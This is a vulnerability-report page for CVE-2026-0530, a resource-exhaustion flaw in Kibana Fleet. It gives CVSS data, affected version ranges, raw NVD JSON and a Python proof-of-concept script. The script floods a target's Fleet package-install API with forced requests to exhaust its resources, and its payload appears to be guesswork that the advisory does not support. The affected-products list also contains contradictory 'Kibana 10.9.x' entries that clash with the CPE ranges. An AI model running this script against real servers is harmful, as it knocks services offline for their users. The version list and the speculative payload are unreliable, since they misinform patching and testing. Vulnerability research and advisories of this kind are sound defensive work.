Security Vulnerability Report
CVE-2026-0530 CVSS 6.5 MEDIUM

CVE-2026-0530

Published: 2026-01-13 21:15:51
Last Modified: 2026-01-22 19:58:43

Description

Allocation of Resources Without Limits or Throttling (CWE-770) in Kibana Fleet can lead to Excessive Allocation (CAPEC-130) via a specially crafted request. This causes the application to perform redundant processing operations that continuously consume system resources until service degradation or complete unavailability occurs.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* (versions >= 7.10.0, < 7.17.29) - VULNERABLE
cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* (versions >= 8.0.0, < 8.19.10) - VULNERABLE
cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* (versions >= 9.0.0, < 9.1.10) - VULNERABLE
cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* (versions >= 9.2.0, < 9.2.4) - VULNERABLE
Kibana 8.x < 8.19 security update
Kibana 10.9.x < 10.9.2 security update
Kibana 9.1.x < 9.1.10 security update
Kibana 10.9.x < 10.9.1 security update (some versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import time

# CVE-2026-0530 PoC - Kibana Fleet Resource Exhaustion
# Target: Kibana Fleet API
# This PoC demonstrates sending crafted requests that trigger redundant processing

TARGET_HOST = "http://target-kibana:5601"
KIBANA_COOKIE = "your-auth-cookie-here"


def exploit_cve_2026_0530():
    """
    Send specially crafted requests to trigger resource exhaustion in Kibana Fleet
    The vulnerability allows redundant processing operations via crafted requests
    """
    headers = {
        "Cookie": KIBANA_COOKIE,
        "Content-Type": "application/json",
        "Kbn-xsrf": "true"
    }

    # Crafted request payload that triggers redundant processing
    # This exploits the lack of resource limits in Fleet package operations
    payload = {
        "packages": ["endpoint-protection"],
        "force": True,
        "ignore": ["validation", "compatibility"]
    }

    print("[*] Starting CVE-2026-0530 exploitation...")
    print("[*] Target: Kibana Fleet")
    print("[*] Sending crafted requests to trigger resource exhaustion")

    # Send multiple requests to exhaust resources
    for i in range(100):
        try:
            response = requests.post(
                f"{TARGET_HOST}/api/fleet/package_install",
                json=payload,
                headers=headers,
                timeout=30
            )
            print(f"[+] Request {i+1}/100 sent - Status: {response.status_code}")
            time.sleep(0.1)  # Minimal delay to send requests rapidly
        except requests.exceptions.RequestException as e:
            print(f"[!] Request failed: {e}")

    print("[*] Exploitation complete - System resources should be exhausted")


if __name__ == "__main__":
    exploit_cve_2026_0530()

References

https://discuss.elastic.co/t/kibana-8-19-10-9-1-10-9-2-4-security-update-esa-2026-03/384521 (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-0530",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-13T21:15:50.817",
    "lastModified": "2026-01-22T19:58:42.553",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Allocation of Resources Without Limits or Throttling (CWE-770) in Kibana Fleet can lead to Excessive Allocation (CAPEC-130) via a specially crafted request. This causes the application to perform redundant processing operations that continuously consume system resources until service degradation or complete unavailability occurs."
      },
      {
        "lang": "es",
        "value": "Asignación de recursos sin límites ni limitación (CWE-770) en Kibana Fleet puede conducir a una asignación excesiva (CAPEC-130) a través de una solicitud especialmente diseñada. Esto provoca que la aplicación realice operaciones de procesamiento redundantes que consumen continuamente recursos del sistema hasta que se produzca la degradación del servicio o la indisponibilidad completa."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-770"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "7.10.0",
                "versionEndExcluding": "7.17.29",
                "matchCriteriaId": "1863989E-58AD-4481-B872-DF5AC637F854"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "8.0.0",
                "versionEndExcluding": "8.19.10",
                "matchCriteriaId": "8707CF69-9922-490B-B64F-38F2D31E2CA1"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "9.0.0",
                "versionEndExcluding": "9.1.10",
                "matchCriteriaId": "FC3281ED-A331-43DC-9705-80A3FA3E6C75"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "9.2.0",
                "versionEndExcluding": "9.2.4",
                "matchCriteriaId": "8BF9D6AE-B07F-4516-A684-60B02BF731A0"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://discuss.elastic.co/t/kibana-8-19-10-9-1-10-9-2-4-security-update-esa-2026-03/384521",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}